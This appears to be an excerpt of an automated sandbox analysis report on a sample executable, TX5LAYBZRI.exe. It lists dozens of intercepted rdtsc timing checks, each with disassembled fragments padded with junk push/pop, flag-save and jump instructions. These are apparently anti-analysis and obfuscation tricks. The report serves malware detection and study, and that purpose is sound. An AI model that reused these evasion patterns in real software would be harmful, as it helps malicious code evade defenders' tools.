Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950D8D second address: 7950DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d jmp 00007FF108C7BF0Dh 0x00000012 nop 0x00000013 jmp 00007FF108C7BF0Eh 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF108C7BF0Ch 0x00000020 sbb ch, 00000068h 0x00000023 jmp 00007FF108C7BF0Bh 0x00000028 popfd 0x00000029 popad 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov ah, dl 0x00000030 pushfd 0x00000031 jmp 00007FF108C7BF0Ch 0x00000036 jmp 00007FF108C7BF15h 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950DFF second address: 7950E2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007FF10887397Eh 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop eax 0x00000017 mov dh, 4Ah 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950E2E second address: 7950E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950E40 second address: 7950E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, dx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950EAF second address: 7950ED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, 799Eh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950ED8 second address: 7950F09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF108873987h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F09 second address: 7950F32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF176C5A68Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F32 second address: 7950F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F36 second address: 7950F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F3A second address: 7950F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F40 second address: 7950F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F46 second address: 7950F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F4A second address: 7950F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b jmp 00007FF108C7BF18h 0x00000010 mov ecx, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F75 second address: 7950F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F79 second address: 7950F7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F7F second address: 7950F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF10887397Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F8E second address: 7950FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov edx, 45F2192Eh 0x00000015 pop edi 0x00000016 pushfd 0x00000017 jmp 00007FF108C7BF14h 0x0000001c or ah, 00000078h 0x0000001f jmp 00007FF108C7BF0Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov edx, 759B06ECh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FE8 second address: 7950FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FEC second address: 7950FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FF0 second address: 7950FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FF6 second address: 7951013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951013 second address: 7951100 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d jmp 00007FF108873987h 0x00000012 lock cmpxchg dword ptr [edx], ecx 0x00000016 pushad 0x00000017 call 00007FF108873984h 0x0000001c jmp 00007FF108873982h 0x00000021 pop ecx 0x00000022 mov cx, dx 0x00000025 popad 0x00000026 pop edi 0x00000027 pushad 0x00000028 jmp 00007FF108873983h 0x0000002d pushfd 0x0000002e jmp 00007FF108873988h 0x00000033 add ecx, 6B261A88h 0x00000039 jmp 00007FF10887397Bh 0x0000003e popfd 0x0000003f popad 0x00000040 test eax, eax 0x00000042 jmp 00007FF108873986h 0x00000047 jne 00007FF176851F86h 0x0000004d jmp 00007FF108873980h 0x00000052 mov edx, dword ptr [ebp+08h] 0x00000055 pushad 0x00000056 movzx eax, di 0x00000059 mov esi, ebx 0x0000005b popad 0x0000005c mov eax, dword ptr [esi] 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF108873980h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951100 second address: 795113D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108C7BF11h 0x00000009 sub esi, 250EA466h 0x0000000f jmp 00007FF108C7BF11h 0x00000014 popfd 0x00000015 mov si, 6497h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx], eax 0x0000001e pushad 0x0000001f mov bx, cx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795113D second address: 795117C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF108873980h 0x0000000a and ax, 3F38h 0x0000000f jmp 00007FF10887397Bh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF108873980h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795117C second address: 795118B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795118B second address: 7951192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951192 second address: 79511A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF108C7BF0Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511A8 second address: 79511C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511C0 second address: 79511C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511C4 second address: 79511C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511C8 second address: 79511CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511CE second address: 79511D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511D4 second address: 79511D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511D8 second address: 795121F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b jmp 00007FF108873980h 0x00000010 mov eax, dword ptr [esi+0Ch] 0x00000013 jmp 00007FF108873980h 0x00000018 mov dword ptr [edx+0Ch], eax 0x0000001b jmp 00007FF108873980h 0x00000020 mov eax, dword ptr [esi+10h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795121F second address: 7951223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951223 second address: 795128C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF108873989h 0x0000000c sbb cx, 3606h 0x00000011 jmp 00007FF108873981h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [edx+10h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx ebx, ax 0x00000021 pushfd 0x00000022 jmp 00007FF108873984h 0x00000027 sub ecx, 3E4B07D8h 0x0000002d jmp 00007FF10887397Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795128C second address: 79512BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108C7BF0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79512BB second address: 795134F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, CAB2h 0x00000007 jmp 00007FF108873983h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+14h], eax 0x00000012 jmp 00007FF108873986h 0x00000017 mov eax, dword ptr [esi+18h] 0x0000001a pushad 0x0000001b movzx ecx, bx 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FF108873986h 0x00000025 sbb cx, 5158h 0x0000002a jmp 00007FF10887397Bh 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov dword ptr [edx+18h], eax 0x00000035 jmp 00007FF10887397Fh 0x0000003a mov eax, dword ptr [esi+1Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF108873985h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795134F second address: 7951355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951355 second address: 7951375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108873981h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951375 second address: 795137B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795137B second address: 7951380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951380 second address: 79513F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+20h] 0x0000000d pushad 0x0000000e push ebx 0x0000000f jmp 00007FF108C7BF0Ch 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF108C7BF0Bh 0x0000001b jmp 00007FF108C7BF13h 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [edx+20h], eax 0x00000025 pushad 0x00000026 mov edi, esi 0x00000028 push eax 0x00000029 pop eax 0x0000002a popad 0x0000002b mov eax, dword ptr [esi+24h] 0x0000002e jmp 00007FF108C7BF19h 0x00000033 mov dword ptr [edx+24h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF108C7BF0Dh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79513F4 second address: 79514AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+28h] 0x0000000e jmp 00007FF10887397Fh 0x00000013 mov dword ptr [edx+28h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FF108873984h 0x0000001d adc ecx, 5FD1E128h 0x00000023 jmp 00007FF10887397Bh 0x00000028 popfd 0x00000029 mov bl, ch 0x0000002b popad 0x0000002c mov ecx, dword ptr [esi+2Ch] 0x0000002f jmp 00007FF10887397Bh 0x00000034 mov dword ptr [edx+2Ch], ecx 0x00000037 jmp 00007FF108873986h 0x0000003c mov ax, word ptr [esi+30h] 0x00000040 pushad 0x00000041 mov dl, ch 0x00000043 jmp 00007FF108873983h 0x00000048 popad 0x00000049 mov word ptr [edx+30h], ax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 movsx edi, si 0x00000053 pushfd 0x00000054 jmp 00007FF10887397Ch 0x00000059 jmp 00007FF108873985h 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79514AF second address: 79514D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF0Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79514D7 second address: 7951534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108873987h 0x00000009 adc ecx, 23D0909Eh 0x0000000f jmp 00007FF108873989h 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov word ptr [edx+32h], ax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF108873986h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951534 second address: 7951580 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007FF108C7BF0Dh 0x0000000b jmp 00007FF108C7BF0Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esi+34h] 0x00000017 jmp 00007FF108C7BF16h 0x0000001c mov dword ptr [edx+34h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF108C7BF0Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951580 second address: 7951586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951586 second address: 79515A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, CFD0h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515A7 second address: 79515AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515AC second address: 79515D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx eax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FF176C5A066h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF108C7BF15h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515D6 second address: 79515EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515EB second address: 795160C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dh, 86h 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795160C second address: 7951612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951612 second address: 7951632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108C7BF12h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951632 second address: 79516AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108873981h 0x00000009 sub ax, 5326h 0x0000000e jmp 00007FF108873981h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 or dword ptr [edx+40h], FFFFFFFFh 0x0000001d jmp 00007FF10887397Ah 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF10887397Dh 0x0000002c sbb si, F336h 0x00000031 jmp 00007FF108873981h 0x00000036 popfd 0x00000037 call 00007FF108873980h 0x0000003c pop esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79516AC second address: 79516E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007FF108C7BF10h 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FF108C7BF0Dh 0x00000018 mov bl, ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79A0B7D second address: 79A0B9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79A0B9A second address: 79A0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0039 second address: 78E004F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E004F second address: 78E0053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0053 second address: 78E0057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0057 second address: 78E005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E067C second address: 78E06CD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF108873986h 0x00000008 xor ecx, 15641558h 0x0000000e jmp 00007FF10887397Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007FF108873988h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 mov dx, 00CEh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0A32 second address: 78E0A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0A38 second address: 78E0AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF10887397Ch 0x00000009 sub al, FFFFFFB8h 0x0000000c jmp 00007FF10887397Bh 0x00000011 popfd 0x00000012 jmp 00007FF108873988h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF10887397Eh 0x00000022 sbb cx, F248h 0x00000027 jmp 00007FF10887397Bh 0x0000002c popfd 0x0000002d mov edi, esi 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FF108873985h 0x00000036 xchg eax, ebp 0x00000037 jmp 00007FF10887397Eh 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AC4 second address: 78E0AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AC8 second address: 78E0ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0ACC second address: 78E0AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AD2 second address: 78E0AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AD8 second address: 78E0AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF108C7BF19h 0x00000010 rdtsc
